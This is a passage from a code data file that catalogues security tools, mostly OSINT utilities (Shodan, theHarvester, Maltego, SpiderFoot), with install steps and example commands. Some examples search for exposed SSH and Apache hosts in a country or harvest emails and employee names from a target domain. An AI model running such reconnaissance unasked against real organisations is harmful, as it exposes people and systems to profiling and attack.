      { flag: 'linux.bash',       description: 'Recover bash history' },
    ],
    examples: [
      { command: 'python3 vol.py -f memory.dmp windows.pslist',   description: 'Process listing' },
      { command: 'python3 vol.py -f memory.dmp windows.cmdline',  description: 'Process command lines' },
      { command: 'python3 vol.py -f memory.dmp windows.filescan | grep ".txt"', description: 'Find text files' },
    ],
    tags: ['forensics', 'memory', 'incident-response'],
  },

  // ── OSINT ─────────────────────────────────────────────────────────────────────

  {
    id: 'shodan',
    name: 'Shodan CLI',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '1.31',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Search engine for internet-exposed devices — IoT, cameras, SCADA and more.',
    install: 'pip3 install shodan && shodan init <API_KEY>',
    flags: [
      { flag: 'shodan search',  description: 'Run a search query' },
      { flag: 'shodan host',    description: 'Detail report for an IP' },
      { flag: 'shodan count',   description: 'Result count' },
      { flag: 'shodan stats',   description: 'Aggregated statistics' },
    ],
    examples: [
      { command: 'shodan search "apache country:TR"',                  description: 'Apache servers in Turkey' },
      { command: 'shodan host 1.2.3.4',                                description: 'IP address report' },
      { command: 'shodan search "port:22 country:TR" --limit 100',     description: 'Open SSH endpoints in Turkey' },
    ],
    tags: ['osint', 'recon', 'internet-scan'],
  },
  {
    id: 'theharvester',
    name: 'theHarvester',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '4.4.3',
    os: ['Linux', 'macOS'],
    description: 'Domain-driven harvesting of emails, subdomains and employee names.',
    install: 'sudo apt install theharvester',
    flags: [
      { flag: '-d', description: 'Target domain' },
      { flag: '-b', description: 'Source (google, bing, linkedin, shodan)' },
      { flag: '-l', description: 'Result limit' },
      { flag: '-f', description: 'HTML/XML report output' },
    ],
    examples: [
      { command: 'theHarvester -d target.com -b google,bing,linkedin', description: 'Multi-source enumeration' },
      { command: 'theHarvester -d target.com -b shodan -f report',     description: 'Shodan + HTML report' },
    ],
    tags: ['osint', 'email', 'recon'],
  },
  {
    id: 'maltego',
    name: 'Maltego',
    category: 'OSINT',
    difficulty: 'intermediate',
    version: 'CE 4.7',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Graph-based intelligence platform mapping people, orgs, IPs and domains.',
    install: '# Download Community Edition from maltego.com (free)\n# Java 11+ required:\nsudo apt install default-jre\n# Registration is required after download',
    flags: [
      { flag: 'Transforms',         description: 'Data transformation engine' },
      { flag: 'Entity Types',       description: 'Person, domain, IP, org, etc.' },
      { flag: 'Run All Transforms', description: 'Query all data sources' },
      { flag: 'Graph View',         description: 'Visualize the relationship map' },
    ],
    examples: [
      { command: '# Domain workflow\n1. Open a new graph\n2. Add Domain entity: target.com\n3. Run All Transforms\n4. Inspect linked subdomains and IPs', description: 'Domain intelligence collection' },
    ],
    tags: ['osint', 'visualization', 'intelligence', 'graph'],
  },
  {
    id: 'spiderfoot',
    name: 'SpiderFoot',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '4.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Automated OSINT collection platform with 200+ sources and a web UI.',
    install: 'pip3 install spiderfoot\n# or:\ngit clone https://github.com/smicallef/spiderfoot\npip3 install -r requirements.txt',
    flags: [
      { flag: '-l <ip:port>',    description: 'Launch the web UI' },
      { flag: '-s <target>',     description: 'CLI target' },
      { flag: '-m <modules>',    description: 'Run specific modules' },
      { flag: '-t <type>',       description: 'Target type (DOMAIN, IP, NAME)' },
      { flag: '-o <format>',     description: 'Output format (tab, csv, json)' },
    ],
    examples: [
      { command: 'python3 sf.py -l 127.0.0.1:5001', description: 'Launch the web UI (open in browser)' },
      { command: 'python3 sf.py -s target.com -t DOMAIN -o csv > report.csv', description: 'Domain scan from the CLI' },
    ],
    tags: ['osint', 'automation', 'reconnaissance', 'internet'],
  },
]

